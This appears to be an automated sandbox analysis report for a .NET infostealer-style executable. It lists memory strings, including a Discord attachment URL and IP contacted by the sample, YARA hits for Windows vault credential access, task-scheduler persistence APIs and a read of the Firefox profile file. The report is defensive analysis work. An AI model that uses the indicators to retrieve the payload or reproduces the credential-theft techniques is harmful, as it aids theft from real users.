Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4087078052.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://media.discordapp.net/attachments/1220534378975854717/1222892686101708902/user-528110_2024-0
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp, T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443

Source: unknown

HTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F65188	0_2_02F65188
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F6A130	0_2_02F6A130
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F6B51C	0_2_02F6B51C
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F68338	0_2_02F68338
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F68328	0_2_02F68328
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F6A0F0	0_2_02F6A0F0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F65182	0_2_02F65182
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F6C7C8	0_2_02F6C7C8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F6C7B8	0_2_02F6C7B8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F6E489	0_2_02F6E489
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F65EC8	0_2_02F65EC8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_02F65E29	0_2_02F65E29
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05AD4D28	0_2_05AD4D28
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05AD12B0	0_2_05AD12B0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05AD1209	0_2_05AD1209
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05AD15E7	0_2_05AD15E7
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05AD28C8	0_2_05AD28C8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B464F0	0_2_05B464F0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B44C60	0_2_05B44C60
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B45803	0_2_05B45803
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B44C58	0_2_05B44C58
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B4502A	0_2_05B4502A
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B40006	0_2_05B40006
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B40040	0_2_05B40040
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B4F2A8	0_2_05B4F2A8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B46AC1	0_2_05B46AC1
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B7D540	0_2_05B7D540
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B716B0	0_2_05B716B0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B7D5E2	0_2_05B7D5E2
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B7D530	0_2_05B7D530
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B75798	0_2_05B75798
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B75788	0_2_05B75788
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B76178	0_2_05B76178
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B7C2D0	0_2_05B7C2D0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05B7C2C0	0_2_05B7C2C0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05C0EBB8	0_2_05C0EBB8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05C00040	0_2_05C00040
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05C00034	0_2_05C00034
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05D17778	0_2_05D17778
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05D17768	0_2_05D17768
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05E7C9F8	0_2_05E7C9F8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05E60040	0_2_05E60040
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 0_2_05E60006	0_2_05E60006
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0114EBC8	1_2_0114EBC8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_01144A60	1_2_01144A60
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0114ACD0	1_2_0114ACD0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_01143E48	1_2_01143E48
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_01144190	1_2_01144190
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_011419B8	1_2_011419B8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0666D558	1_2_0666D558
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0666BCDC	1_2_0666BCDC
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_06676638	1_2_06676638
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_066755E8	1_2_066755E8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0667B280	1_2_0667B280
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0667C1D8	1_2_0667C1D8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_06677DC8	1_2_06677DC8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_06672B30	1_2_06672B30
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_066776E8	1_2_066776E8
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_0667E3F0	1_2_0667E3F0
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_06670040	1_2_06670040
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_06675D38	1_2_06675D38
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Code function: 1_2_06670006	1_2_06670006

Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePmfcahfwm.dll" vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000477F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.000000000485F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1649013598.0000000005AF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000048EF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.0000000004967000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1641702888.00000000049EB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamee5e91891-7867-4b86-a47d-bb7bc78fea84.exe4 vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1650391650.0000000005C80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1647338287.00000000055E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePmfcahfwm.dll" vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1635476932.000000000121E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000002.1636489772.000000000315D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamee5e91891-7867-4b86-a47d-bb7bc78fea84.exe4 vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000000.00000000.1626641074.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOkfhzt.exe" vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4084734470.0000000000440000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamee5e91891-7867-4b86-a47d-bb7bc78fea84.exe4 vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe, 00000001.00000002.4085009012.0000000000B69000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs T_240369_S#U0130PAR#U0130S.exe
Source: T_240369_S#U0130PAR#U0130S.exe	Binary or memory string: OriginalFilenameOkfhzt.exe" vs T_240369_S#U0130PAR#U0130S.exe

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	Section loaded: gpapi.dll	Jump to behavior

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 1.2.T_240369_S#U0130PAR#U0130S.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.3308d20.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.4a01830.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.322e800.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.31ee1f4.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'

Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.T_240369_S#U0130PAR#U0130S.exe.5c80000.17.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@2/2

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\T_240369_S#U0130PAR#U0130S.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Mutant created: NULL

Source: T_240369_S#U0130PAR#U0130S.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: T_240369_S#U0130PAR#U0130S.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\T_240369_S#U0130PAR#U0130S.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: T_240369_S#U0130PAR#U0130S.exe

